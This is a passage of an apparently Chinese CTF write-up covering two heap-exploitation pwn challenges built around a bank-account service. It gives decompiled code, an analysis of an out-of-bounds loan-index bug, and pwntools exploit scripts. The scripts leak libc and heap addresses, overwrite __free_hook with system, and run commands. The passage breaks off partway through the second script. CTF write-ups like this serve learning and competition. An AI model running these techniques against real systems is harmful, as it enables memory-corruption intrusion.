class="number">15</span></span><br><span class="line">            uuid[i] = <span class="built_in">chr</span>(get_random(random_num))</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            random_num = objdll.rand() % <span class="number">15</span></span><br><span class="line">            uuid[i] = <span class="built_in">chr</span>(get_random(random_num &amp; <span class="number">3</span> | <span class="number">8</span>))</span><br><span class="line">uuid = <span class="string">&#x27;&#x27;</span>.join(uuid)</span><br><span class="line"><span class="built_in">print</span>(uuid)</span><br><span class="line">r.send(uuid)</span><br><span class="line">r.recv(<span class="number">0x84</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">query</span>():</span></span><br><span class="line">    sleep(<span class="number">0.1</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;query&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">new_account</span>(<span class="params">account, password, money</span>):</span></span><br><span class="line">    sleep(<span class="number">0.1</span>)</span><br><span class="line">    payload = <span class="string">b&#x27;&#x27;</span></span><br><span class="line">    payload += <span class="string">b&#x27;new_account&#x27;</span>.ljust(<span class="number">0x10</span>, <span class="string">b&#x27;\x00&#x27;</span>)</span><br><span class="line">    payload += password.ljust(<span class="number">0x8</span>, <span class="string">b&#x27;\x00&#x27;</span>)</span><br><span class="line">    payload += account.ljust(<span class="number">0x20</span>, <span class="string">b&#x27;\x00&#x27;</span>)</span><br><span class="line">    payload += <span class="built_in">bytes</span>(<span class="built_in">str</span>(money), encoding=<span class="string">&#x27;utf8&#x27;</span>).ljust(<span class="number">0x4</span>, <span class="string">b&#x27;\x00&#x27;</span>)</span><br><span class="line">    r.sendline(payload)</span><br><span class="line">    r.recv(<span class="number">0x84</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cancellation</span>(<span class="params">password</span>):</span></span><br><span class="line">    sleep(<span class="number">0.1</span>)</span><br><span class="line">    payload = <span class="string">b&#x27;&#x27;</span></span><br><span class="line">    payload += <span class="string">b&#x27;cancellation&#x27;</span>.ljust(<span class="number">0x10</span>, <span class="string">b&#x27;\x00&#x27;</span>)</span><br><span class="line">    payload += password.ljust(<span class="number">0x8</span>, <span class="string">b&#x27;\x00&#x27;</span>)</span><br><span class="line">    r.sendline(payload)</span><br><span class="line">    r.recv(<span class="number">0x84</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">login</span>(<span class="params">account, password</span>):</span></span><br><span class="line">    sleep(<span class="number">0.1</span>)</span><br><span class="line">    payload = <span class="string">b&#x27;&#x27;</span></span><br><span class="line">    payload += <span class="string">b&#x27;login&#x27;</span>.ljust(<span class="number">0x10</span>, <span class="string">b&#x27;\x00&#x27;</span>)</span><br><span class="line">    payload += password.ljust(<span class="number">0x8</span>, <span class="string">b&#x27;\x00&#x27;</span>)</span><br><span class="line">    payload += account.ljust(<span class="number">0x20</span>, <span class="string">b&#x27;\x00&#x27;</span>)</span><br><span class="line">    r.sendline(payload)</span><br><span class="line">    r.recv(<span class="number">0x84</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">update_pwd</span>(<span class="params">old_password, new_password</span>):</span></span><br><span class="line">    sleep(<span class="number">0.1</span>)</span><br><span class="line">    payload = <span class="string">b&#x27;update_pwd&#x27;</span>.ljust(<span class="number">0x10</span>, <span class="string">b&#x27;\x00&#x27;</span>)</span><br><span class="line">    payload += new_password.ljust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>)</span><br><span class="line">    r.sendline(payload)</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;please input your pasword.&#x27;</span>)</span><br><span class="line">    r.recv(<span class="number">0x84</span> - <span class="built_in">len</span>(<span class="string">&#x27;please input your pasword.&#x27;</span>))</span><br><span class="line">    payload = <span class="string">b&#x27;\x00&#x27;</span>*<span class="number">0x10</span></span><br><span class="line">    payload += old_password.ljust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>)</span><br><span class="line">    r.sendline(payload)</span><br><span class="line">    r.recv(<span class="number">0x84</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">new_account(<span class="string">b&#x27;dzhsb&#x27;</span>, <span class="string">b&#x27;wow&#x27;</span>, <span class="number">0x100</span>)</span><br><span class="line"></span><br><span class="line">sleep(<span class="number">0.1</span>)</span><br><span class="line">r.sendline(<span class="string">b&#x27;exit_account&#x27;</span>)</span><br><span class="line"></span><br><span class="line">new_account(<span class="string">b&#x27;dzz&#x27;</span>, <span class="string">b&#x27;zzz&#x27;</span>, <span class="number">0x100</span>)</span><br><span class="line"></span><br><span class="line">sleep(<span class="number">0.1</span>)</span><br><span class="line">r.sendline(<span class="string">b&#x27;exit_account&#x27;</span>)</span><br><span class="line"></span><br><span class="line">new_account(<span class="string">b&#x27;a&#x27;</span>, <span class="string">b&#x27;a&#x27;</span>, <span class="number">0x100</span>)</span><br><span class="line"></span><br><span class="line">sleep(<span class="number">0.1</span>)</span><br><span class="line">r.sendline(<span class="string">b&#x27;stat_query&#x27;</span>)</span><br><span class="line">r.recv(<span class="number">0x4</span>+<span class="number">0x18</span>)</span><br><span class="line">libc_base = u64(r.recv(<span class="number">8</span>)) - <span class="number">0x21c87</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(libc_base))</span><br><span class="line">r.recv(<span class="number">0x84</span> - <span class="number">0x24</span>)</span><br><span class="line"></span><br><span class="line">cancellation(<span class="string">b&#x27;a&#x27;</span>)</span><br><span class="line">login(<span class="string">b&#x27;dzz&#x27;</span>, <span class="string">b&#x27;zzz&#x27;</span>)</span><br><span class="line">cancellation(<span class="string">b&#x27;zzz&#x27;</span>)</span><br><span class="line">login(<span class="string">b&#x27;dzhsb&#x27;</span>, <span class="string">b&#x27;wow&#x27;</span>)</span><br><span class="line">query()</span><br><span class="line">r.recv(<span class="number">0x40</span> + <span class="number">4</span>)</span><br><span class="line">heap_addr = u64(r.recv(<span class="number">8</span>))</span><br><span class="line">tcache_addr = u64(r.recv(<span class="number">8</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(heap_addr))</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(tcache_addr))</span><br><span class="line"></span><br><span class="line">free_hook = libc_base + <span class="number">0x3ed8e8</span></span><br><span class="line">system_addr = libc_base + libc.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line"></span><br><span class="line">sleep(<span class="number">0.1</span>)</span><br><span class="line">r.sendline(<span class="string">b&#x27;exit_account&#x27;</span>)</span><br><span class="line"></span><br><span class="line">login(flat(tcache_addr), flat(heap_addr))</span><br><span class="line">update_pwd(flat(heap_addr), flat(free_hook))</span><br><span class="line"></span><br><span class="line">sleep(<span class="number">0.1</span>)</span><br><span class="line">r.sendline(<span class="string">b&#x27;exit_account&#x27;</span>)</span><br><span class="line"></span><br><span class="line">new_account(<span class="string">b&#x27;&gt;&amp;4&#x27;</span>, <span class="string">b&#x27;cat flag&#x27;</span>, <span class="number">0x100</span>)</span><br><span class="line"></span><br><span class="line">sleep(<span class="number">0.1</span>)</span><br><span class="line">r.sendline(<span class="string">b&#x27;exit_account&#x27;</span>)</span><br><span class="line">new_account(<span class="string">b&#x27;196082&#x27;</span>, flat(system_addr), <span class="number">0x100</span>)</span><br><span class="line"></span><br><span class="line">sleep(<span class="number">0.1</span>)</span><br><span class="line">r.sendline(<span class="string">b&#x27;exit_account&#x27;</span>)</span><br><span class="line">login(<span class="string">b&#x27;&gt;&amp;4&#x27;</span>, <span class="string">b&#x27;cat flag&#x27;</span>)</span><br><span class="line">cancellation(<span class="string">b&#x27;cat flag&#x27;</span>)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<p>因为这是cs架构的缘故，没有直接与程序进行交互，所以无法使用<code>system(&quot;/bin/sh&quot;);</code>。考虑使用反弹shell但是需要长度过长了，最后只能用这种重定向的方法传递flag。</p>
<h2 id="money"><a href="#money" class="headerlink" title="_money"></a>_money</h2><h3 id="利用分析-2"><a href="#利用分析-2" class="headerlink" title="利用分析"></a>利用分析</h3><p>这道题目的逆向部分和上面题目很类似，细心的话可以很快发现。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">__int64 <span class="title">loan</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  __m128i *v0; <span class="comment">// rax</span></span><br><span class="line">  __int64 chunk; <span class="comment">// rdx</span></span><br><span class="line">  <span class="keyword">int</span> v2; <span class="comment">// ecx</span></span><br><span class="line">  _DWORD *v3; <span class="comment">// rax</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> ( loan_idx &gt; <span class="number">10</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    my_puts(<span class="string">&quot;The loan has reached the upper limit of the system.&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">2LL</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span> <span class="keyword">if</span> ( *(_DWORD *)(user_list[uid] + <span class="number">0x34</span>LL) )</span><br><span class="line">  &#123;</span><br><span class="line">    my_puts(<span class="string">&quot;You still have a loan that has not been paid off, so you cannot continue to borrow.&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">2LL</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    my_puts(<span class="string">&quot;Please enter the loan amount (no more than 1 million).&quot;</span>);</span><br><span class="line">    money = input_l();</span><br><span class="line">    <span class="keyword">if</span> ( (<span class="keyword">unsigned</span> <span class="keyword">int</span>)money &gt; <span class="number">0xF4240</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      my_puts(<span class="string">&quot;Don&#x27;t push your luck.&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">      my_puts(<span class="string">&quot;Please leave your comments.&quot;</span>);</span><br><span class="line">      my_read((<span class="keyword">char</span> *)(loan_money + <span class="number">72LL</span> * loan_idx + <span class="number">0x20</span>), <span class="number">0x20</span>);</span><br><span class="line">      v0 = (__m128i *)(loan_money + <span class="number">72LL</span> * loan_idx);</span><br><span class="line">      chunk = user_list[uid];</span><br><span class="line">      *v0 = _mm_loadu_si128((<span class="keyword">const</span> __m128i *)(chunk + <span class="number">8</span>));</span><br><span class="line">      v0[<span class="number">1</span>] = _mm_loadu_si128((<span class="keyword">const</span> __m128i *)(chunk + <span class="number">0x18</span>));</span><br><span class="line">      LODWORD(chunk) = loan_idx;</span><br><span class="line">      v2 = money;</span><br><span class="line">      *(_QWORD *)(loan_money + <span class="number">72LL</span> * loan_idx + <span class="number">0x40</span>) = (<span class="keyword">unsigned</span> <span class="keyword">int</span>)money;</span><br><span class="line">      v3 = (_DWORD *)user_list[uid];</span><br><span class="line">      v3[<span class="number">10</span>] += v2;</span><br><span class="line">      v3[<span class="number">12</span>] += v2;</span><br><span class="line">      v3[<span class="number">14</span>] = chunk;</span><br><span class="line">      v3[<span class="number">13</span>] = <span class="number">1</span>;</span><br><span class="line">      loan_idx = chunk + <span class="number">1</span>;</span><br><span class="line">      my_puts(<span class="string">&quot;The application has been submitted. Please check it.&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">2LL</span>;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这个函数中的因为对<code>loan_idx</code>检查不正确导致越界读写。利用思路就是通过越界写修改size，使原本chunk的size变为<code>0x460</code>，释放后进入<code>unsorted bin</code>通过越界读读取libc地址。再通过同样的办法使第一个chunk进入到tcache中去，泄漏出堆地址。最后有两个指针指向同一个地址，理所当然修改tcache中chunk的fd指针即可。</p>
<h3 id="exp-2"><a href="#exp-2" class="headerlink" title="exp"></a>exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">r = process(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc.so.6&#x27;</span>)</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">context.terminal = [<span class="string">&#x27;tmux&#x27;</span>, <span class="string">&#x27;splitw&#x27;</span>, <span class="string">&#x27;-h&#x27;</span>]</span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">query</span>():</span></span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;your choice :     &#x27;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;Query&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">new_account</span>(<span class="params">account, password, money</span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;your choice :     &#x27;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;new_account&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;please input the account id&#x27;</span>)</span><br><span class="line">    r.sendline(account)</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;please input the password&#x27;</span>)</span><br><span class="line">    r.sendline(password)</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;please input the money&#x27;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">bytes</span>(<span class="built_in">str</span>(money), encoding=<span class="string">&#x27;utf8&#x27;</span>))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete_account</span>(<span class="params">password</span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;your choice :     &#x27;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;Cancellation&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;please enter the password&#x27;</span>)</span><br><span class="line">    r.sendline(password)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">update_info</span>(<span class="params">new_password, old_password</span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;your choice :     &#x27;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;Update_info&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;please entet  a new password&#x27;</span>)</span><br><span class="line">    r.sendline(new_password)</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;please input your password.&#x27;</span>)</span><br><span class="line">    r.sendline(old_password)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">loan_money</span>(<span class="params">amount, comments</span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;your choice :     &#x27;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;Loan_money&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;Please enter the loan amount (no more than 1 million).&#x27;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">bytes</span>(<span class="built_in">str</span>(amount), encoding=<span class="string">&#x27;utf8&#x27;</span>))</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;Please leave your comments.&#x27;</span>)</span><br><span class="line">    r.sendline(comments)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">repayment</span>(<span class="params">amount</span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;your choice :     &#x27;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;Repayment&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;How much do you want to repay?&#x27;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">bytes</span>(<span class="built_in">str</span>(amount), encoding=<span class="string">&#x27;utf8&#x27;</span>))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show_all_loan</span>():</span></span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;your choice :     &#x27;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&quot;I&#x27;m vip!&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">exit_account</span>():</span></span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;your choice :     &#x27;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;Exit_account&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">login</span>(<span class="params">account, password</span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;your choice :     &#x27;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;login&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;please input the account id&#x27;</span>)</span><br><span class="line">    r.sendline(account)</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;please input the password&#x27;</span>)</span><br><span class="line">    r.sendline(password)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>):</span><br><span class="line">    new_account(<span class="built_in">bytes</span>(<span class="built_in">chr</span>(<span class="number">0x61</span> + i), encoding=<span class="string">&#x27;utf8&#x27;</span>)*<span class="number">0x20</span>,</span><br><span class="line">                <span class="built_in">bytes</span>(<span class="built_in">chr</span>(<span class="number">0x31</span> + i), encoding=<span class="string">&#x27;utf8&#x27;</span>), <span class="number">0x100</span>)</span><br><span class="line">    exit_account()</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>):</span><br><span class="line">    login(<span class="built_in">bytes</span>(<span class="built_in">chr</span>(<span class="number">0x61</span> + i), encoding=<span class="string">&#x27;utf8&#x27;</span>)*<span class="number">0x20</span>,</span><br><span class="line">          <span class="built_in">bytes</span>(<span class="built_in">chr</span>(<span class="number">0x31</span> + i), encoding=<span class="string">&#x27;utf8&#x27;</span>))</span><br><span class="line">    loan_money(<span class="number">0x100</span>, <span class="string">b&#x27;dzhsb&#x27;</span>)</span><br><span class="line">    exit_account()</span><br><span class="line"></span><br><span class="line">new_account(flat(<span class="number">0</span>, <span class="number">0x461</span>, [<span class="number">0</span>]*<span class="number">2</span>),</span><br><span class="line">            <span class="built_in">bytes</span>(<span class="built_in">chr</span>(<span class="number">0x31</span> + <span class="number">10</span>), encoding=<span class="string">&#x27;utf8&#x27;</span>), <span class="number">0x100</span>)</span><br><span class="line">exit_account()</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">4</span>):</span><br><span class="line">    new_account(<span class="built_in">bytes</span>(<span class="built_in">chr</span>(<span class="number">0x61</span> + i + <span class="number">11</span>), encoding=<span class="string">&#x27;utf8&#x27;</span>)*<span class="number">0x20</span>,</span><br><span class="line">                <span class="built_in">bytes</span>(<span class="built_in">chr</span>(<span class="number">0x31</span> + i + <span class="number">11</span>), encoding=<span class="string">&#x27;utf8&#x27;</span>), <span class="number">0xffffffff</span>)</span><br><span class="line">    exit_account()</span><br><span class="line"></span><br><span class="line">login(flat(<span class="number">0</span>, <span class="number">0x461</span>, [<span class="number">0</span>]*<span class="number">2</span>), <span class="built_in">bytes</span>(<span class="built_in">chr</span>(<span class="number">0x31</span> + <span class="number">10</span>), encoding=<span class="string">&#x27;utf8&#x27;</span>))</span><br><span class="line">loan_money(<span class="number">0x100</span>, <span class="string">b&#x27;dzhsb&#x27;</span>)</span><br><span class="line">exit_account()</span><br><span class="line"></span><br><span class="line">login(flat(<span class="number">0</span>, <span class="string">b&#x27;dzhsb\x00&#x27;</span>, <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x12</span>), flat([<span class="number">0</span>]))</span><br><span class="line">delete_account(flat(<span class="number">0</span>))</span><br><span class="line"></span><br><span class="line">login(<span class="string">b&#x27;o&#x27;</span>*<span class="number">0x20</span>, <span class="string">b&#x27;?&#x27;</span>)</span><br><span class="line">show_all_loan()</span><br><span class="line">r.recvuntil(<span class="string">b&#x27;jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj&#x27;</span>)</span><br><span class="line">r.recvuntil(<span class="string">b&#x27;Loan account  :&#x27;</span>)</span><br><span class="line">r.recv(<span class="number">0x10</span>)</span><br><span class="line"></span><br><span class="line">libc_base = u64(r.recv(<span class="number">8</span>)) - <span class="number">0x1ecbe0</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(libc_base))</span><br><span class="line">system_addr = libc_base + libc.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">free_hook = libc_base + <span class="number">0x1eee48</span></span><br><span class="line"></span><br><span class="line">exit_account()</span><br><span class="line">new_account(<span class="string">b&#x27;elephant&#x27;</span>.ljust(<span class="number">0x20</span>, <span class="string">b&#x27;\x00&#x27;</span>), <span class="string">b&#x27;/bin/sh\x00&#x27;</span>, <span class="number">0x100</span>)</span><br><span class="line"></span><br><span class="line">exit_account()</span><br><span class="line">new_account(<span class="string">b&#x27;196082&#x27;</span>+<span class="string">b&#x27;\x00&#x27;</span>*(<span class="number">0x20</span>-<span class="number">0x6</span>), <span class="string">b&#x27;X&#x27;</span>+<span class="string">b&#x27;\x00&#x27;</span>*<span class="number">0x7</span>, <span class="number">0x100</span>)</span><br><span class="line"></span><br><span class="line">exit_account()</span><br><span class="line">new_account(<span class="string">b&#x27;fuck_man&#x27;</span>+<span class="string">b&#x27;\x00&#x27;</span>*(<span class="number">0x20</span>-<span class="number">0x8</span>), <span class="string">b&#x27;SB&#x27;</span>+<span class="string">b&#x27;\x00&#x27;</span>*<span class="number">0x6</span>, <span class="number">0x100</span>)</span><br><span class="line"></span><br><span class="line">exit_account()</span><br><span class="line">login(<span class="string">b&#x27;196082&#x27;</span>+<span class="string">b&#x27;\x00&#x27;</span>*(<span class="number">0x20</span>-<span class="number">0x6</span>), <span class="string">b&#x27;X&#x27;</span>+<span class="string">b&#x27;\x00&#x27;</span>*<span class="number">0x7</span>)</span><br><span class="line">delete_account(<span class="string">b&#x27;X&#x27;</span>+<span class="string">b&#x27;\x00&#x27;</span>*<span class="number">0x7</span>)</span><br><span class="line">login(<span class="string">b&#x27;elephant&#x27;</span>.ljust(<span class="number">0x20</span>, <span class="string">b&#x27;\x00&#x27;</span>), <span class="string">b&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line">delete_account(<span class="string">b&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line"></span><br><span class="line">login(<span class="string">b&#x27;n&#x27;</span>*<span class="number">0x20</span>, <span class="string">b&#x27;&gt;&#x27;</span>.ljust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">show_all_loan()</span><br><span class="line">r.recvuntil(<span class="string">b&#x27;jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj&#x27;</span>)</span><br><span class="line">r.recvuntil(<span class="string">b&#x27;Loan account  :&#x27;</span>)</span><br><span class="line">r.recv(<span class="number">0x10</span>)</span><br><span class="line">heap_base = u64(r.recv(<span class="number">8</span>)) - <span class="number">0x5d0</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(heap_base))</span><br><span class="line"></span><br><span class="line">exit_account()</span><br><span class="line">new_account(<span class="string">b&#x27;elephant&#x27;</span>.ljust(<span class="number">0x20</span>, <span class="string">b&#x27;\x00&#x27;</span>), <span class="string">b&#x27;/bin/sh\x00&#x27;</span>, <span class="number">0x100</span>)</span><br><span class="line"></span><br><span class="line">exit_account()</span><br><span class="line">new_account(<span class="string">b&#x27;196082&#x27;</span>+<span class="string">b&#x27;\x00&#x27;</span>*(<span class="number">0x20</span>-<span class="number">0x6</span>), <span class="string">b&#x27;X&#x27;</span>+<span class="string">b&#x27;\x00&#x27;</span>*<span class="number">0x7</span>, <span class="number">0x100</span>)</span><br><span class="line"></span><br><span class="line">exit_account()</span><br><span class="line">login(<span class="string">b&#x27;fuck_man&#x27;</span>+<span class="string">b&#x27;\x00&#x27;</span>*(<span class="number">0x20</span>-<span class="number">0x8</span>), <span class="string">b&#x27;SB&#x27;</span>+<span class="string">b&#x27;\x00&#x27;</span>*<span class="number">0x6</span>)</span><br><span class="line">delete_account(<span class="string">b&#x27;SB&#x27;</span>+<span class="string">b&#x27;\x00&#x27;</span>*<span class="number">0x6</span>)</span><br><span 